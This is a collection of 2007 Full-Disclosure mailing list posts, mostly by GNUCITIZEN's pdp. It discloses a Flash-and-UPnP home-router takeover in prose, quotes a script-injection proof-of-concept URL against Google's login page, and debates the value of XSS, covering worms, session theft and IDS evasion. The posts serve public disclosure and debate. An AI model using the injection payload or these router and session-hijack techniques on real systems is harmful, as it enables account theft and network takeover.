[Full-disclosure] Hacking The Interwebs
http://www.gnucitizen.org/blog/hacking-the-interwebs When the victim visits a malicious SWF file, a 4 step ATTACK will silently execute in the background. At that moment the attacker will have control over their router, pretty much regardless of its model. *Many of the home routers are vulnerable to this attack as many of them support UPnP to one degree or another.* The attack does not rely on any bugs. Simply put, when two completely legitimate technologies, Flash and UPnP, are combined together, they compose a vulnerability, which exposes many home networks to a great risk. The attack depends on the fact that most, if not all, routers are UPnP enabled. The UPnP SOAP service can be accessed without authorization over the default Web Admin Interface. With the help of Flash, the attacker can send arbitrary SOAP messages to the router's UPnP control point and as such reconfigure the device in order to enable further attacks.. The most malicious of all malicious things to do when a device is compromised via the attack described in the link pointed at the top of this email, is to change the primary DNS server. That will effectively turn the router and the network it controls into a zombie which the attacker can take advantage of whenever they feel like it. It is also possible to reset the admin credentials and create the sort of onion routing network all bad guys want. Many routers come with Layer3 portforwarding UPnP service. This is also a potential vector that attackers can use. In cases like this, they will simply expose ports behind the router on the Internet facing side. ***We hope that by exposing this information, we will drastically improve the situation for the future. I think that this is a lot better than keeping it for ourselves or risking it all by given the criminals the opportunity to have in possession a secret which no one else is aware of.* The best way to protect against this attack is turn off UPnP if your router's Admin Interface allows it. It seams that many routers simply does not have this feature. More information on related UPnP research can be found here: http://www.gnucitizen.org/ http://www.gnucitizen.org/blog/steal-his-wi-fi http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-5 http://www.gnucitizen.org/blog/hacking-with-upnp-universal-plug-and-play GNUCITIZEN is a Cutting Edge, Ethical Hacker Outfit, Information Think Tank, which primarily deals with all aspects of the art of hacking. Our work has been featured in established magazines and information portals, such as Wired, Eweek, The Register, PC Week, IDG, BBC and many others. The members of the GNUCITIZEN group are well known and well established experts in the Information Security, Black Public Relations (PR) Industries and Hacker Circles with widely recognized experience in the government and corporate sectors and the open source community. GNUCITIZEN is an ethical, white-hat organization that doesn't hide anything. We strongly believe that knowledge belongs to everyone and we make everything to ensure that our readers have access to the latest cutting-edge research and get alerted of the newest security threats when they come. Our experience shows that the best way of protection is mass information. And we mean that literally!!! It is in the public's best interest to make our findings accessible to vast majority of people, simply because it is proven that the more people know about a certain problem, the better. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org http://www.hakiri.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] authentic hackers still do it for the love ... (was: Hell Camp: It never pays enough)
right, this is what I like to call hacker romanticism, but do you know what? it does not work this way! only in the movies, I guess! so if you are a hacker, if you truly believe that you are a hacker, then you will find a way to be better off then anybody else without the need to break any laws and without compromising your passions at all. there is one very old Chinese saying: find a job that you love and you will never work for the rest of your life. Being a technically talented person and spending your life as a poor sysadmin is plain stupid not to say completely unnecessary. Running away from money because you think that they will corrupt you or they will compromise your identity is also quite retarded to say, don't you think? money are just means to an end, a tool of trade, and sometimes this is exactly what you need in order to cross to the next level. hacking is not about the inner geek and the vision of the lonely cyber worrier. hacking is about outsmarting others. it is about thinking creatively and moreover, thinking differently. if you can hack computer systems, then hack life. you will soon realize the the skills that you have obtained while being a technical hacker can be applied to many other disciplines, and these skills are more valuable then you think. collecting the fruits of your work is the most rewarding feeling. the problem I see is that hacking has become something that is not. the computer security hacker circles lost the sense of creativity and turned it into plain procedure. most, if not all, of the security vulnerabilities discovered today are discovered due to simple rules. you do this, you run that, you wait, you've got it. this is not hacking. given enough time, anybody can learn that. but embracing the mindset is something that a few can do. btw, GC is currently running a project to show the reality of what I've juts said. it is still in very initial stage but it will get better with the time: hakiri.com On Dec 2, 2007 6:28 AM, coderman [EMAIL PROTECTED] wrote: On Dec 1, 2007 9:12 PM, Goebbels Amadeus [EMAIL PROTECTED] wrote: ... Have you ever considered your future in their hands? You've been working for 50 years, your liver and kidneys start failing, creating visible symptoms, stains in your skin. You can't handle life in the same way anymore. For what? What have you done in those 50 years but serving another man to become more wealthy and over powered. The approaching day of your death and its mere vision strikes you like a burning iron blade. ... talented youth started emerging and dedicated passionately to fulfill its curiosity. Day after day, spending countless hours in front of a machine. Understanding it's inner design and details, breaking it apart and reassembling it the way it wasn't meant to be assembled. [a parable of looking for filthy lucre in a trade of love, only to to discover that these dark funds have tainted the joy and purity of a process and lifestyle that once brought fulfillment] sooner or later every authentic hacker discovers that you must separate work from play. when you try and mix them both you betray the joy and fulfillment of hacking for a paycheck, and it never pays enough. the ability of a person to deny and downplay this reality will determine their ability to abide the infosecwhore industry. as captain of their own independent ship they can insulate themselves from much of this whoreish taint, but sooner or later a labor for lucre will destroy the love. no need to preach, the authentic hacker will discover this on their own accord sooner or later. it is inevitable. for those of you on the cusp of this realization and ready to start anew, do it. abandon ship. find a comfy admin or analyst position with decent benefits and a wage that pays the mortgage. adopt that pseudonym and rediscover the joy of hacking for its own sake. the rewards are still there, worth more than a dollar can provide... --- as with any broad categorization there are exceptions to this rule. there is a minuscule minority that has found an amalgamation sufficiently lucrative and deeply enjoyable without compromising on any personal integrity. to these people i say: you lucky fucks! may i find such fortune one day... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gmail 0day
this means a lot today :) if you haven't noticed! On Nov 8, 2007 10:00 PM, silky [EMAIL PROTECTED] wrote: On 11/9/07, pdp (architect) [EMAIL PROTECTED] wrote: well this XSS can lead to so much data being stolen that it is not even funny! orly? -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gmail 0day
well this XSS can lead to so much data being stolen that it is not even funny! On Nov 8, 2007 8:55 PM, Juergen Marester [EMAIL PROTECTED] wrote: wow ! 0day ! damn, right now 0day are fucking XSS ... On 11/8/07, silky [EMAIL PROTECTED] wrote: worked for me minutes after it was posted. seems fixed now. On 11/9/07, crazy frog crazy frog [EMAIL PROTECTED] wrote: i tested it on gmail latest version,itsnot working for me? On Nov 8, 2007 7:04 AM, Scripter Hack [EMAIL PROTECTED] wrote: There is a html injection vulnerability in https://www.google.com. It is very critical,you can get the cookie to login into gmail ore other service. POC: https://www.google.com/accounts/ServiceLogin?service=mailrm=falsecontinue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dlltmpl=defaultltmplcache=2passive=truel#;/scriptscriptalert('xss')/script1-=1 More:http://xss2root.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- advertise on secgeeks? http://secgeeks.com/Advertising_on_Secgeeks.com http://newskicks.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- mike http://lets.coozi.com.au/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] on xss and its technical merit
comments inlined On Nov 5, 2007 12:07 AM, reepex [EMAIL PROTECTED] wrote: On Nov 4, 2007 4:43 PM, pdp (architect) [EMAIL PROTECTED] wrote: lets say 1 servers are running a vuln ftpd and another 1 are running the same open source web app. Which would you rather have the explot for? also which would be more practical to attack? assuming you have the same system and a good exploit you could get all the 1 ftpds, while the xss on 1 msg boards would require 1 users to view the page you attacked. well I will go for the 1 ftpds in general. However, it really depends on what I am doing. As I said, these FTPDs may give you access to the system but probably not access to the data which to me is a lot more interesting. In this case 1 XSS sounds a lot more valuable. Which 'data' are you talking about? the servers info (in this case the server running the ftpd daemon) or the data/personal machines of the users of the ftpd? I would rather have control of the ftpd then simply backdoor the daemon to work on indivivual users, just as I would rather control on the web server itself rather than any pre-exsiting xss bugs. again the whole point is that you do not need xss ever if you have client side exploits or access to the server itself. well of course. I would like to control the server as well but sometimes this is simply not possible or feasible in anyway. remember, we are not talking about whether XSS is suitable for all kinds of attacks. We are talking about the technical merits of XSS. Keep in mind that many client side exploits are XSS for the browser, as I've already mentioned. Well for example, the FTP and the Web server both have to be in the DMZ. However the Web server also needs to speak to the Application Server. Compromising the FTP server does not give you anything apart from a control over the FTP. You have no access to the data probably. If you compromise the Web server, ok fair enough, this is more then critical but again, how feasible is it I don't know? There are XSS script kiddies as well Buffer Overflow script kiddies. Just because you can find XSS does not mean that you've done something amazing and extraordinary. It takes skills and a lot of effort to make something out of it. But as I said before, open your mind. There are endless potentials when it comes to XSS. yes and i guess bad for you is that the only xss you really see posted (fd, milw0rm, security focus) is people posting scriptalert('hi')/script BTW, it does look like an achievement when you find a XSS inside an application that 1000 more people play with (look for similar bugs) on a daily basis. XSS in some small apps are stupid. XSS on the default Google Search Interface is as valuable as remotely exploitable buffer overflow for Linux 2.6.x kernels (distribution independent). Again i think if you are attacking the users of a site instead of the site itself this is acceptable but your attacks could become much more hazardous if you owned the google server itself (maybe a stretch in the case of google) and added whatever code you wanted to the front page/ or embedded your nice browser exploit in the page. either of these ways seems much more valuable then xssing people who are signed in and visited your page. ok... but what are the chances of hacking into the Google Web server? Close to nothing, especially when you are dealing with a closed source software. One of the way to own the server is to trick the admins into visiting a page which will steal their authenticated sessions or infect their browsers. IMHO, this one makes a lot more sense and sounds a lot more feasible. One of the things that I like about XSS in general is that in order to exploit a vulnerability you really have to plan every stage of the attack. Setting traps and making Google's and Yahoo's systems play your game is an extraordinary experience and a great eye opener. also (unless im missing) something in another email you mentioned like 15 different kinds of xss which I am sure are all interesting in their own way but the most you can get out of them is simple browser games. As I said, this is not the case. Chrome based XSS, we covered a few in the XSS book I believe, are very different, for example. In some case the XSS vector resides inside a Sandbox. Now you need to find a way to get out of the sandbox and and as such reaching again the browser internals. Flash based XSS can lead to a lot of damages especially when combined with something like desktop AIR applications which are granted with full control over the client machine. AIR also can run HTML pages which also can lead to evalated privilages and as such access to the system. What about desktop and mobile Widgets? XSS, like Buffer Overflow attacks, can be very customized. In terms of Flash, for example, you need to know how the Flash file is structured. You
Re: [Full-disclosure] on xss and its technical merit
reepex they are not weaker. they are different. in situations where the corporate network is protected by two layers of different types of firewalls, IPS, IDS, etc, etc ... one of the ways to sneak in is via XSS. Buffer Overflow wont work cuz you can attack only machines that are on the Internet facing side. You have a bunch of firewalls and IDSs which will stop any packet the data of which contains something like a nop sled. Ok you might be able to evade the IDS detection by replacing the nop sled with other types of useless but equal to performing nothing instructions but you must admit that we are pushing BFs here too much. BF is not a universal solution. XSS in this case will serve almost the same maybe even better job. Moreover, the technical expertise that is required in order to get something like the XSS scenario pointed above, is beyond the capabilities of most security guys out there. you need to have a very good understandings about browsers, networks, the web in general and other things like that, because once your payload is dropped inside the corporate network you are blind as a bat. You have no idea what you are doing. You have no control over the process. Believe me, it is really hard to pull a trick like that. I've done it a few times for demonstration purposes and I needed to spend 5 days on average in research and testing prior to the exercise. Not to mention that in order to passby some IDS you have to be very creative with how you are obfuscating the payload. Oh, when speaking about payloads, XSS is very different beast when compared to BF attacks. The payload is custom every time. This is the reason why I started coding AttackAPI as a library rather then exploitation toolkit like Metasploit. Here, I would like to draw your attention to the origins of XSS cuz I believe that you as well as others are very confused what this attack is all about. The attack came as an alternative of the client-side exploits Georgi Guninski was releasing for IE at the time. The issue was not new but I believe David Ross and bunch of other guys from Microsoft first described it in a formal manner. The attack was known as script injection before that. Cross-site scripting is rather misleading name. We are not cross scripting sites. We are cross scripting origins. For example: https://google.com http://google.com are the same site. But https://google.com is not accessible to http://google.com, i.e they are in different origins. Therefore Cross-site scripting should be really called Cross-origin Scripting. Cross-origin Scripting is nothing more but the attack vector known as Cross-zone scripting, the root cause for browser/client-side vulnerabilities. Therefore, any client-side exploit that relays on injecting scripts into a different origin is XSS. Keep in mind that I am following a very simple logic here. Even my grandfather can understand that. Also, remote file includes should be known as a form of XSS. Why? Cuz we are scripting a different origin again. SQL Injection is also a form of XSS - we scripting the origin of the SQL backend. However, let's not use XSS in this way cuz I believe a lot of people will get even more confused about it. You may disagree but this is how I see it and I stick behind my words as I've done it so far. XSS is largely complicated type of attack. It is very hard to pull and requires a lot of technical knowledge. It is easy to find useless XSS vectors but exploiting them is an art very few can practice at the moment. The beauty of buffer overflow exploits is in their sharpness. The beauty of XSS is in the imagination of the attacker and the level of tangled complexity you have to deal with. On Nov 5, 2007 12:11 AM, reepex [EMAIL PROTECTED] wrote: you see i do not agree with this because you are relying on other bugs to make xss useful and again you are relying on interaction from the user. any bug that requires another (form of) bug to be useful or that requires user interaction is inherently weaker then then other any time bugs like bof/sql injection/whatever On Nov 4, 2007 5:16 PM, pdp (architect) [EMAIL PROTECTED] wrote: well valid point. XSS can alway be used as a career to whatever kind of attack you have in there. Just imagine the MySpace XSS warm combined with the IE VML or one of these ActiveX bugs that allow you to write into arbitery files on the file system (so that it is not a software bug). Hmmm? On Nov 4, 2007 11:51 PM, [EMAIL PROTECTED] wrote: What about when xss leads to stack overflows and command injections? See http://xs-sniper.com. It would seem that if you subscribe to the thought that only attacks that take over a victims computer are valid, then you would have to now admit xss as valid as well. Nate Sent via BlackBerry from T-Mobile -Original Message- From: reepex [EMAIL PROTECTED] Date: Sun, 4 Nov 2007 13:26:17 To:full-disclosure@lists.grok.org.uk, pdp (architect) [EMAIL
Re: [Full-disclosure] on xss and its technical merit
comments inlined On Nov 4, 2007 8:01 PM, Volker Tanger [EMAIL PROTECTED] wrote: Greetings! On Sun, 4 Nov 2007 13:26:17 -0600 reepex [EMAIL PROTECTED] wrote: we are talking about whether XSS is as technical as other security disciplines. We are also talking about whether it should have a deserved an recognized place among FD readers and contributers. [...] 1) XSS isnt techincal no matter how its used [...] 3) XSS does not have a place on this list or any other security list and i remember when the idea of making a seperate bugtraq for xss was proposed and i still think it should be done. XSS is a variant on missing or lax input verification. Thus all other forms of input-nonverification like buffer overflows or char(0) injections or the like should be handeled similarily. agree! In its simplest version XSS could be used for phishing - which is bad enough for banking or business portals. Depending on the application other elevations might be possible through XSS like session stealing, cmd/sql injects, etc. Especially if such an elevated XSS was detected for a software it definitely would have a place on security mailing lists. But it should be more qualified than just XSS found on . Just running a XSS scanner is lame - whereas finding out all consequences and possible attack vectors and maybe even posting a patch might be a worthwile posting. XSS has been already detect in software... AOL Instant Messenger was vulnerable to XSS not that long time ago. The default screen where you type all your text is nothing more but the IE web browser. Google GTalk and Skype also use the IE browser. The AOL IM was vulnerable to an attack where remote users can send a specially crafted message which will render within the context of the remote IE instance. IE within AOL runs with full privalages, i.e there is no sandbox. This means that you can easily start running WScript (WSH) scripts. We know what that leads to, do we? This is a variation of XSS that effects client-side technologies. This bug could have lead to one of the biggest worm outbreaks ever seen. No user interaction was required in order to launch the attack! Bye Volker -- Volker Tangerhttp://www.wyae.de/volker.tanger/ -- [EMAIL PROTECTED]PGP Fingerprint 378A 7DA7 4F20 C2F3 5BCC 8340 7424 6122 BB83 B8CB ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] on xss and its technical merit
with it. Good luck! 5) publishing xss shows your weakness and that you dont have the ability to find actual bugs ( b/c xss isnt a vuln its crap ) publishing XSS makes you look stupid as well publishing a DoS cuz you haven't investigated enough to see whether and how your findings can be exploited. moreover, publishing XSS is not ethical. it is wrong and people should stop doing it. or at least stop bragging about it. However, just because you found interesting XSS vector, it does no mean that you are stupid or an idiot. there are some very clever XSS attacks and clever people that stay behind them. again, I don't want to involve these people into the discussion against their will, so I will contact them personally and ask whether they would like to be mentioned. reepex, I am sorry but all your statements are groundless. I was expecting something more from you, especially after we exchanged a few private emails. sometimes, I get the feeling that you actually know what you are talking about. you definitely know a few things but c'mon, really... give me something juicy... cheers, pdp P.S. I am sorry for the unconvenionece.. this message has to me approved first. I am not a FD member and the list management interface is unresponsive at the moment. On Nov 4, 2007 7:26 PM, reepex [EMAIL PROTECTED] wrote: Pdp architect and I have been emailing back and forth about whether xss has a place in fd, bugtraq, or the security research area at all. He decided that we should start a discussion about in on here and gets peoples unmoderated opinion. This discussion should not concern whether its important due to stealing bank info, paypal, whatever it should only stick to xss as a pure research area. Or as pdp described it: we are talking about whether XSS is as technical as other security disciplines. We are also talking about whether it should have a deserved an recognized place among FD readers and contributers. however, the topic wont cover only whether you can detect or inject XSS, this is lame. it will cover the whole 9 yards... pretty much all the topics covered inside the XSS book. My ideas on the topic are 1) XSS isnt techincal no matter how its used 2) people who use xss on pentests/real hacking/anything but phishing are lame and only use it because they cannot write real exploits (non-web) or couldnt find any other web bugs (sql injection, cmd exec,file include, whatever) 3) XSS does not have a place on this list or any other security list and i remember when the idea of making a seperate bugtraq for xss was proposed and i still think it should be done. 4) if you go into a pentest/audit and all you get out is xss then its a failed pentest and the customer should get a refund. 5) publishing xss shows your weakness and that you dont have the ability to find actual bugs ( b/c xss isnt a vuln its crap ) i think pdp is going to respond first. should be fun ;) -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] on xss and its technical merit
your weakness and that you dont have the ability to find actual bugs ( b/c xss isnt a vuln its crap ) Imho a xss is a vuln as much as the others, since if used smartly could get quite dangerous. Reading a report from zone-h i read that the most effective hacking cause it's the xss.. i don't know if i shall agree with this, but obviously it should make us think about it. bye /nexus -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFHLitaVVYXVqV+ctMRAkcEAKCLXroIu80OemE/m/voaN4iczrJigCfTH3Q EJOb41+Eex4lFNy1AHJ9xhE= =ICJh -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] on xss and its technical merit
comments inlined... On Nov 4, 2007 9:26 PM, reepex [EMAIL PROTECTED] wrote: i seemed to reply to nexxus as you were writing your original reply which ive since replied to. about this email though... On Nov 4, 2007 3:13 PM, pdp (architect) [EMAIL PROTECTED] wrote: XSS today is where buffer overflows were 10-15 year ago. Moreover, did you missed when I said that 99% of all sites are vulnerable to XSS. Given the percentage of available XSS vulnerabilities, what chance you think you have finding one? simple math! of course it is easy. It is easy for most of XSS issues. However, those that really matter are not easy at all. DOM based XSS is a debug hell, mainly because every time you want to do something you have to deal with the remote server. This is not very ofline. yes buffer overflows were everywhere then and yes xss is everywhere now. but to say that xss is the buffer overflow of 15 years ago is not a good comparison. Even if xss evolves for 15 years, which it may, would the result be as damaging as even simple stack based overflows have been? Could you have such mass damage worms as overflows have caused? I know there has been myspace worms (which you mention), but xss cannot have the same effect as overflows to a server. MySpace grew from 20 infected profiles to over 3 million in less then 24 hours. I am not very good at computer virology, but to my knowledge, this is the fastest spreading worm ever. Today XSS worms can be a lot more powerful. I wrote a paper on that called For my next trick... hacking Web2.0. Check it out if you trust my professional input. lets say 1 servers are running a vuln ftpd and another 1 are running the same open source web app. Which would you rather have the explot for? also which would be more practical to attack? assuming you have the same system and a good exploit you could get all the 1 ftpds, while the xss on 1 msg boards would require 1 users to view the page you attacked. well I will go for the 1 ftpds in general. However, it really depends on what I am doing. As I said, these FTPDs may give you access to the system but probably not access to the data which to me is a lot more interesting. In this case 1 XSS sounds a lot more valuable. xss just does not have the same potentional as overflows do unless browsers develop some new technology or extend an old one to let client side scripting to have much more control on the system. they don't have the same potentials yet but they can be as nasty as buffer overflows. as I said, most of the applications people use today are located on the Web. In this case owning their machine is pointless. OK, you will be able to install sniffers and keyloggers but for what? You can simply infect their profile with XSS so every time they open the application you gain control. Isn't that the same. Hook the victims on a XSS proxy such as Carnaval and you have a botnet. The concepts are exactly the same. The only difference is that Web application are written with Web technologies, where bin applications are compiled from C, or whatever language you have, sources. So XSS for Webs is like Buffer Overflows for Bins. if you want to do it right, then it is harder to get a successful XSS attack. do you know why? cuz XSS involves a bit of strategy as well. because it is an indirect type of attack. A single XSS attack sometimes may involve several sub XSS each one of which call the next one in an exponential manner. By the time you reach level 5 you head is so screwed up that you need to start all over again because you code breaks on 50 places. JavaScript in particular is not an easy language. You may think that you know it but you don't know 90% of it. When it comes to scoping you get into a mess of things. Have you ever done XSS on GMail. Try it! See how far you will go. Unless you have some solid understanding on AJAX debuging and some nifty tools that can put back Google's mess into order, you have no chance. Today software hackers relay on tools such as IDA Pro or Soft Ice, which is discontinue but still. Check this out there are not tools like that for XSS and in particular AJAX, therefore I have to start from zero. Where is my JavaScript deobfiscator? I don't have one... I have to write it myself. Where is my debugger. I am stuck with Firebug for Firefox... Great! How about dynamic tracing, tracking, stepping and all other things on a complete BlackBox application that you can only see the incoming and outgoing requests. At least when you have a binary you know what it is. You can do it offline and you have all of the parts. XSS can be very complicated. Don't be fulled by what people post on FD. the problem is that if you are going to xss 5 times deep why cant you just find a client side browser bug? you are researching how to basically steal credentials/force requests/steal accounts when one browser
Re: [Full-disclosure] on xss and its technical merit
dude, are you a bot? cuz you answer like a bot.. completely out of context and without any sort of sense... listen English is not my first language either but at least I am trying. I would suggest to go back an re-read the email over and over again until you understand the meaning. On Nov 4, 2007 11:07 PM, Dude VanWinkle [EMAIL PROTECTED] wrote: On 11/4/07, reepex [EMAIL PROTECTED] wrote: On Nov 4, 2007 3:13 PM, pdp (architect) [EMAIL PROTECTED] wrote: This is not very offline. So you are taking peoples offline conversations and posting them against their wishes? Are you trying to make a name for yourself by saying look this guy actually talks to me? What a joke. -JP -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] on xss and its technical merit
well valid point. XSS can alway be used as a career to whatever kind of attack you have in there. Just imagine the MySpace XSS warm combined with the IE VML or one of these ActiveX bugs that allow you to write into arbitery files on the file system (so that it is not a software bug). Hmmm? On Nov 4, 2007 11:51 PM, [EMAIL PROTECTED] wrote: What about when xss leads to stack overflows and command injections? See http://xs-sniper.com. It would seem that if you subscribe to the thought that only attacks that take over a victims computer are valid, then you would have to now admit xss as valid as well. Nate Sent via BlackBerry from T-Mobile -Original Message- From: reepex [EMAIL PROTECTED] Date: Sun, 4 Nov 2007 13:26:17 To:full-disclosure@lists.grok.org.uk, pdp (architect) [EMAIL PROTECTED] Subject: [Full-disclosure] on xss and its technical merit Pdp architect and I have been emailing back and forth about whether xss has a place in fd, bugtraq, or the security research area at all. He decided that we should start a discussion about in on here and gets peoples unmoderated opinion. This discussion should not concern whether its important due to stealing bank info, paypal, whatever it should only stick to xss as a pure research area. Or as pdp described it: we are talking about whether XSS is as technical as other security disciplines. We are also talking about whether it should have a deserved an recognized place among FD readers and contributers. however, the topic wont cover only whether you can detect or inject XSS, this is lame. it will cover the whole 9 yards... pretty much all the topics covered inside the XSS book. My ideas on the topic are 1) XSS isnt techincal no matter how its used 2) people who use xss on pentests/real hacking/anything but phishing are lame and only use it because they cannot write real exploits (non-web) or couldnt find any other web bugs (sql injection, cmd exec,file include, whatever) 3) XSS does not have a place on this list or any other security list and i remember when the idea of making a seperate bugtraq for xss was proposed and i still think it should be done. 4) if you go into a pentest/audit and all you get out is xss then its a failed pentest and the customer should get a refund. 5) publishing xss shows your weakness and that you dont have the ability to find actual bugs ( b/c xss isnt a vuln its crap ) i think pdp is going to respond first. should be fun ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] on xss and its technical merit
comments inlined! I have to cuz you inlined yours On Nov 4, 2007 9:04 PM, reepex [EMAIL PROTECTED] wrote: On Nov 4, 2007 2:41 PM, pdp (architect) [EMAIL PROTECTED] wrote: 1) XSS isnt techincal no matter how its used Also, as buffer overflows and other attacks, which are more or less related to them, attackers need to take into consideration the execution flow and as such make the attack stealthier. I agree with this on a very high level but not in actual application. Having limited chars in a xss isnt really comparable to having limited characters in a buffer overflow. having A-Za-z0-9 in xss only limits what scripting elements you can use while the same for bin exploiting makes you rely only on opcodes and addresses in that range. Writing alpanumeric shellcode compared to writing limited xss ( esp with the ease you can redirect to other pages and thus not be limited at all ) is not even a close comparison technically. Also controlling execution flow of a browser which you only control javascript or similar is no where near as challenging as having to control the execution of a binary or even moreso a kernel after you have destroyed much of its data and have to repair it to a usable state after. I agree, it is more complicated but don't you think that you have most of the tools already built for you? for example, I needed to write my own shell like interface for firefox just to get some of these nifty BASH tricks working when doing Web based attacks, including finding and exploiting of XSS. The only reason bin exploits are harder is because you have to deal with opcodes. So, this does not mean that you are smarter... it just means that you are nerdier. It does require a lot of effort to get going... I agree. And I have a great respect for everyone that does it. But I don't think that it is something I cannot personally get my head on if I really want to. It is all about dedication, something that I and a lot of XSS people already showed that have it in some solid forms. But if you are saying that JavaScript is easier to read then opcodes, you are right! 2) people who use xss on pentests/real hacking/anything but phishing XSS is bar far the only way to run untrusted code within the origins of a trusted domain without having a browser vulnerability on first place. SQL Injection and file inclusion attacks still exists, I deal with them on a daily basis, but the attack surface is largely mitigated by various types of frameworks which power most of the modern applications. However, why do you need SQL Injection when you can perform the needed action on behalf of the user by using XSS? It is safer and a lot stealthier. If you want to change someones details or want to get some data out, XSS is completely valid type of attack. With software (bin) vulns you arent only relying on a user or browser or anything. you have vulnerabilities in the server software or perimeter devices so you are cutting out any user interaction ( which is a very important thing ), but maybe i am caring too much about your wording of bar far the only. Bin vulns are finer and there is no doubt about that. But you have to think creatively. You are banging on the front door which is gardded by god knows what. How is that for a stealth? If you are spreading a worm, ok you have no problem with that but in case you want to penetrate a network you better think twice. First of all, you may fail. Second, you may loose all your hard work for nothing. You are giving away your well researched exploit. We have the tools the catch the little beast. It is different when it comes to XSS. XSS attacks can be tangled into the Web so deep that you won't be able to find them unless you have some sort of control over the remote servers, which you probably don't. It is indirect, which means that you have to think several steps in advance, because the vector may take any form and place. Most of the tools are located on the Web. The data is on the Web, ok the Intranet, when it comes to corporate stuff, but it is still based on Web technologies. I am not sure if you agree with me but I always say that you have to pick the best tools for the job. So here is a question for you: If most of the data is based on Web technologies what tools would you use in order to get it? Buffer overflows? Common on, do you have any idea how relevant these vulnerabilities are when it comes to the Web. They represent in total 0.01%. On the other hand XSS represent 99% .. which one would you pick? also with xss you are limited to the tasks that web application can do unlike full control of the server which allows you to do whatever you want and allows for much deeper penetration into the network. I agree but most of the time attackers are after the data not a control over the server. This so 1984. the people I've seen who use XSS today, have a vast background on traditional attack techniques
Re: [Full-disclosure] [EMAIL PROTECTED]
military grade exploits? :) dude, I am sorry man.. but you are living in some kind of a dream world. get real, most of the military hacks are as simple as bruteforcing the login prompt.. or trying something as simple as XSS. the reason XSS is soo neat is because it bypasses all firewalls... what?, your military grade exploit can do that? your military grade exploit can attack only the things that are visible from outside. if you want to sink into the stuff then do web hacking cuz it just works. btw, the reason I do mostly web hacking and information architecture, is because I love the topic and find it fascinating, something that you will never experience since you are looking for military grade exploits. find a job that you love and you will never work till the rest of your life, as they say... oh btw, maybe you can write a military grade exploit but you suck in other things... this is the real world. different people do different things and are experienced in different disciplines. that's why we do tiger-teams. or you can do all of it? :) on offense, right? I am just in a mood for philosophical conversations today. :) btw, this is your 3rd message on FD, right? On 10/14/07, phioust [EMAIL PROTECTED] wrote: I believe this discussion is about people who have real skills ( which is why you are confused ).. not o so I couldn't finish my CS degree or function outside of computers so now I am doing XSS for a living If XSS is the extent of your knowledge then I guess it will get food on your table but I think you should switch to this: http://www.securityfocus.com/archive/105 mailing list. and btw: needing someone to visit a webpage so you can xsrf isnt exactly military grade 0day nor is it stealthy ( not that you would know anything about stealthy exploits) but i guess people jumped on it so much so that their cissp capable minds wouldn't be confused by sql injection [1]. I also do not know why you assume someone that doesnt consider lame XSS as an 'exploit' could not work professionally. Maybe you just have no skill and thats all your job requires of you? [1] http://seclists.org/dailydave/2007/q4/0016.html On 10/14/07, pdp (architect) [EMAIL PROTECTED] wrote: I really don't know what you refer to as an exploit.. :) and more over, it is obvious that you have a lack of knowledge on what's more valuable nowadays. don't take it personal. do you work professionally? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - 